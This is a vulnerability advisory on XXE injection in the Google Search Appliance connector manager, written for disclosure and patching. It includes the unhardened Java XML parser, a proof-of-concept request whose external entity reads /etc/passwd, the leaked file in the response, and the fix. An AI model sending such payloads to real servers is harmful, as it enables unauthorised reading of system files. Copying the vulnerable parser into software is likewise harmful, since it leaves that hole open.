Multiple XML External Entity Injection Vulnerabilities
======================================================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
The Google Search Appliance (GSA) provides a management interface to interact with
the installed connectors for the data crawling. This management interface contains
multiple XML External Entity (XXE) vulnerabilities, which can be used to read files
with the privileges of the running Apache Tomcat instance. The access to the servlets
is most of the times restricted by an IP/Host filter, but could also be disabled by
configuration.


Exploitation Technique
======================
Remote


Status
======
Reported


Vulnerable Code Section
=======================
projects/connector-manager/source/java/com/google/enterprise/connector/util/XmlParseUtil.java:
[...]
public static Document parse(InputStream in,
	SAXParseErrorHandler errorHandler,
	EntityResolver entityResolver) {
  try {
	DocumentBuilder builder = factory.newDocumentBuilder();
	builder.setErrorHandler(errorHandler);
	builder.setEntityResolver(entityResolver);
	Document document = builder.parse(in);
	return document;
  } catch (ParserConfigurationException pce) {
	LOGGER.log(Level.SEVERE, "Parse exception", pce);
  } catch (SAXException se) {
	LOGGER.log(Level.SEVERE, "SAX Exception", se);
  } catch (IOException ioe) {
	LOGGER.log(Level.SEVERE, "IO Exception", ioe);
  }
  return null;
}
[...]



Proof of Concept
================
Using the current version (99ed927) from the git repository:

Request:
POST /connector-manager/authenticate HTTP/1.1
Host: 192.168.48.2:8080
User-Agent: python-requests/2.9.1
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 229

<!DOCTYPE foo [
    <!ENTITY bar SYSTEM "file:///etc/passwd">
    ]>
    <AuthnRequest>
        <Credentials>
            <Username>&bar;</Username>
            <Password>afoo</Password>
        </Credentials>
    </AuthnRequest>

Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=UTF-8
Content-Length: 1400
Date: Tue, 05 Jan 2016 14:16:32 GMT

<CmResponse>
  <AuthnResponse>
    <Success ConnectorName="existing_connector">
      <Identity>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
</Identity>
    </Success>
  </AuthnResponse>
</CmResponse>


Solution
========
External Entities should be disabled. The OWASP provides some guidelines how to
configure the XML libraries in Java:
https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing#JAXP_DocumentBuilderFactory_and_SAXParserFactory


Affected Versions
=================
>= git commit 51e438f9481308a3f91cd333e018fc654637d645
< git commit 25506a3abf139753cbafd40137c19278700519ca


Timeline
========
2016-01-05: Vulnerabilities found
2016-01-05: GOOGLE informed
2016-01-07: Bugs confirmed
2016-03-03: Patches available at github


References
==========
[1] https://github.com/googlegsa/manager.v3/
[2] https://bufferoverflow.eu/BC-1502.txt
[3] https://www.insinuator.net/2016/03/classical-web-vulns-found-in-google-search-appliance-7-4


Advisory-ID
===========
BC-1502


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.